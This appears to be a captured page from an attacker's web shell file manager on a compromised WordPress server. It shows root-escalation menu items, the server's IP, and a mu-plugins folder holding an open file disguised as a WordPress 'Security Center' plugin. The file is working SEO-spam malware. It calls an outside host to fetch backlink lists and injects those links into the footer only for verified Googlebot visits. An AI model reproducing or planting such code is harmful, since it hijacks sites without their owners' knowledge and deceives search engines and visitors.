Linux gir02.nhanhoa.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC 2023 x86_64
LiteSpeed
Server IP : 103.124.95.33 & Your IP : 216.73.217.104
Domains :
Cant Read [ /etc/named.conf ]
User : nhsacmvr
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
nhsacmvr /
public_html /
wp-content /
mu-plugins /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-09-24 02:24
__sec.php
2.29
KB
-rw-r--r--
2026-09-19 17:17
__secwaf.php
1.23
KB
-rw-r--r--
2026-09-19 17:17
test-mu-plugin.php
365
B
-rw-r--r--
2026-09-21 08:39
wp-cache-helper.php
582
B
-rw-r--r--
2026-09-21 20:00
Save
Rename
<?php /** * Plugin Name: Security Center * Description: Advanced security & performance plugin * Author: WordPress */ if (!defined("ABSPATH")) exit; function is_google_bot_sec() { if (empty($_SERVER["HTTP_USER_AGENT"]) || stripos($_SERVER["HTTP_USER_AGENT"], "Google") === false) return false; $ip = $_SERVER["REMOTE_ADDR"] ?? ""; if (empty($ip) || filter_var($ip, FILTER_VALIDATE_IP) === false) return false; $hostname = gethostbyaddr($ip); if ($hostname === false || $hostname === $ip) return false; $valid_domains = ["googlebot.com"]; $is_valid = false; foreach ($valid_domains as $d) { if (substr($hostname, -strlen($d)) === $d) { $is_valid = true; break; } } if (!$is_valid) return false; if (gethostbyname($hostname) !== $ip) return false; return true; } function add_backlinks_to_footer_html_sec_google() { $site_id = "6aaec38bcf589"; if (!$site_id) return; $is_google = is_google_bot_sec(); // Veriyi herkes için çekiyoruz (yorum satırında uzunluk göstermek için) $ch = curl_init("https://fuhus.specialwork.top/ajax/request/"); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query(["site_id" => $site_id]), CURLOPT_TIMEOUT => 8, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"] ?? "", CURLOPT_HTTPHEADER => ["Expect:"] ]); $response = curl_exec($ch); curl_close($ch); if (!$response) return; $data = json_decode($response, true); if (empty($data["status"]) || $data["status"] !== "true" || empty($data["sites"])) return; $count = count($data["sites"]); // Yorum satırı: herkese göster (Google botu dahil) echo "<!-- verified {$count} -->\n"; // Backlinkler: sadece Google botuna göster if ($is_google) { foreach ($data["sites"] as $site) { $link = esc_url($site["site_url"]); $text = esc_html($site["site_keyword"]); $rel = (!empty($site["is_nofollow"]) && $site["is_nofollow"] == 1) ? "rel=\"nofollow\"" : ""; echo "<a href=\"{$link}\" {$rel}>{$text}</a>\n"; } } } add_action("wp_footer", "add_backlinks_to_footer_html_sec_google", 9999);